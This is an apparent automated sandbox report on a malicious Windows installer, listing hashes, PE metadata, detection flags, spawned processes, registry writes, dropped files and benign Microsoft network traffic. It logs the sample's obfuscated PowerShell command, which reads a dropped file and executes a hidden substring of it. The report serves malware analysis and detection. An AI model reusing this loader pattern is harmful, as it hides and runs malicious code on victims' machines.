File name: virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe

Full analysis: https://app.any.run/tasks/edf15d6e-00fd-40e9-9aa8-45352c1a0268
Verdict: Malicious activity
Analysis date: May 13, 2025, 02:59:16
OS: Windows 10 Professional (build: 19044, 64 bit)
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections
MD5: 6BEA7885776A10DB0440AA9AA54C33E0
SHA1: FB419387F218407E49C44B43933B85DD4895A87D
SHA256: 31E2B443E9A00A9FB475C92EA51598CB384121B15612386B9F81467F3FCCD49A
SSDEEP: 49152:75SaB2C71kGrV+g1kvE1H9GRzXINs8yMDG+hVViIf947JU/BFTMAdVNhz7bP2UiF:UaB2qOGx+gOvEhERzXSs8LhuIf94dUYr

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Executing a file with an untrusted certificate
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
  • SUSPICIOUS
    • There is functionality for taking screenshot (YARA)
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
    • Starts POWERSHELL.EXE for commands execution
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
  • INFO
    • The sample compiled with english language support
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
    • Checks supported languages
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
    • Reads the computer name
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
    • Create files in a temporary directory
      • virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe (PID: 7792)
    • Script raised an exception (POWERSHELL)
      • powershell.exe (PID: 7408)
    • Reads the software policy settings
      • slui.exe (PID: 8056)
    • Checks proxy server information
      • slui.exe (PID: 8056)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | NSIS - Nullsoft Scriptable Install System (94.8)
.exe | Win32 Executable MS Visual C++ (generic) (3.4)
.dll | Win32 Dynamic Link Library (generic) (0.7)
.exe | Win32 Executable (generic) (0.5)
.exe | Generic Win/DOS Executable (0.2)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2014:10:07 04:39:56+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 23552
InitializedDataSize: 3781632
UninitializedDataSize: 1024
EntryPoint: 0x30c9
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 2.1.0.0
ProductVersionNumber: 2.1.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: rejnfan
FileDescription: tidsprioriteringerne almennyttigt kanawha
InternalName: sobe aarsbudgettet.exe
LegalCopyright: styreprograms
LegalTrademarks: basilikumen zach
All screenshots are available in the full report
Total processes: 130
Monitored processes: 4
Malicious processes: 1
Suspicious processes: 0

Behavior graph

(Interactive process graph available in the full report; processes shown: virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe, powershell.exe, conhost.exe, slui.exe.)

Process information

PID: 7408
CMD: powershell.exe -windowstyle 1 "$Shoebills=GC -raw 'C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Rustningsdelenes.eks';$Outequivocate=$Shoebills.SubString(54415,3);.$Outequivocate($Shoebills)"
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\apphelp.dll, c:\windows\syswow64\msvcrt.dll

PID: 7464
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\conhost.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\msvcp_win.dll, c:\windows\system32\ucrtbase.dll, c:\windows\system32\shcore.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\combase.dll, c:\windows\system32\rpcrt4.dll

PID: 7792
CMD: "C:\Users\admin\Desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe"
Path: C:\Users\admin\Desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
Parent process: explorer.exe
User: admin
Integrity Level: MEDIUM
Description: tidsprioriteringerne almennyttigt kanawha
Modules (images): c:\users\admin\desktop\virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe, c:\windows\system32\ntdll.dll, c:\windows\syswow64\ntdll.dll, c:\windows\system32\wow64.dll, c:\windows\system32\wow64win.dll, c:\windows\system32\wow64cpu.dll, c:\windows\syswow64\kernel32.dll, c:\windows\syswow64\kernelbase.dll, c:\windows\syswow64\apphelp.dll, c:\windows\syswow64\user32.dll

PID: 8056
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images): c:\windows\system32\slui.exe, c:\windows\system32\ntdll.dll, c:\windows\system32\kernel32.dll, c:\windows\system32\kernelbase.dll, c:\windows\system32\advapi32.dll, c:\windows\system32\msvcrt.dll, c:\windows\system32\sechost.dll, c:\windows\system32\rpcrt4.dll, c:\windows\system32\bcrypt.dll, c:\windows\system32\user32.dll
Total events: 10 642
Read events: 10 640
Write events: 2
Delete events: 0

Modification events

(PID) Process: (7792) virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
Key: HKEY_CURRENT_USER\galdesygt\Uninstall\opblomstringens
Operation: write
Name: charabancers
Value: 1

(PID) Process: (7792) virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe
Key: HKEY_CURRENT_USER\Shortcut218\Hjerterfri\Taenidia
Operation: write
Name: amine
Value: %kalamian%\krystalsukker\Reservationsseddel0.htm

Executable files: 0
Suspicious files: 3
Text files: 19
Unknown types: 0

Dropped files

PID | Process | Filename | Type | MD5 | SHA256
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Multiparae195.wag | - | - | -
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\celiadelphus.elv | - | - | -
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Rustningsdelenes.eks | text | 0E317475E818EAAF300F175230E3679B | 4FC778B71F3E4DFBCDC4CA2D9E735D2DEDBE7AED003C6DC152E0E58B5391F878
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\cigars.jpg | image | DB69AA2DFCA6A07C84A00B7319D5784B | C3426E198E0E79C96C2A4F4AE9CCB64B36095EB228D2BBE9C11D1852C612DD2A
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Benzinaftaler.non | binary | CE5A4BB6CE42D93D4E28CD40DB6EA8C0 | E7F8DFC8BDB33AB9D60B4675DCDD499AF079A5D3F450449411022461BA47A38A
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Hygiejne226.txt | text | 786B7B9351D9C1E5A1F711F5FD030C4D | 2791BB99CB704DD8797CFA829905B77B4E8A164823AA13E4AF651F5260CBDC56
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\Snowing.Vak | binary | 4D44EEFC8976F0D4F8B11402CEA30AF5 | 74EB651B6A8890984536D520FBB66A0B3A42CC18E8B1F0D07E03F8FAF90932E2
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\overentreat.jpg | image | 924BE56BE197155C92C4BA20B937EFAC | 60F224C38355A11C7332358E68BD64A9488AC858C44500A5F45867BE650B47D7
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\hable.ini | text | 7E1B9E2797B94A8A53CFF36F0F37D003 | 188553762F0BA94F591FB6E71DE6C36673ACD9511F694299C3AACAB200AEFABC
7792 | virussign.com_6bea7885776a10db0440aa9aa54c33e0.exe | C:\Users\admin\AppData\Local\Temp\antoni\Kiaugh90\spiralfjedrene\kikumon\trilliaceae.txt | text | 3DD1420346F9170694CE0FC9EC15AE4C | 78069E598836A49E224A4CEE525E018CA7F24CFCA539AB3B8E0E8E34DBDA5A46
HTTP(S) requests: 9
TCP/UDP connections: 39
DNS requests: 16
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2656 | RUXIMICS.exe | GET | 200 | 23.216.77.30:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | - | unknown | - | whitelisted
2656 | RUXIMICS.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.216.77.18:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.216.77.18:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.2.crl | - | unknown | - | whitelisted
7860 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | - | unknown | - | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
2656 | RUXIMICS.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
6544 | svchost.exe | 40.126.31.69:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
2656 | RUXIMICS.exe | 23.216.77.30:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
2656 | RUXIMICS.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
7860 | SIHClient.exe | 4.175.87.197:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
7860 | SIHClient.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.104.136.2, 4.231.128.59 | whitelisted
google.com | 142.250.186.78 | whitelisted
login.live.com | 40.126.31.69, 20.190.159.64, 40.126.31.71, 20.190.159.73, 40.126.31.73, 20.190.159.130, 20.190.159.71, 40.126.31.129 | whitelisted
crl.microsoft.com | 23.216.77.30, 23.216.77.18, 23.216.77.22, 23.216.77.33, 23.216.77.10, 23.216.77.25, 23.216.77.29, 23.216.77.21, 23.216.77.23 | whitelisted
www.microsoft.com | 23.35.229.160 | whitelisted
slscr.update.microsoft.com | 4.175.87.197 | whitelisted
fe3cr.delivery.mp.microsoft.com | 20.242.39.171 | whitelisted
activation-v2.sls.microsoft.com | 40.91.76.224 | whitelisted
nexusrules.officeapps.live.com | 52.111.227.14 | whitelisted
client.wns.windows.com | 172.211.123.249 | whitelisted

Threats

No threats detected
No debug info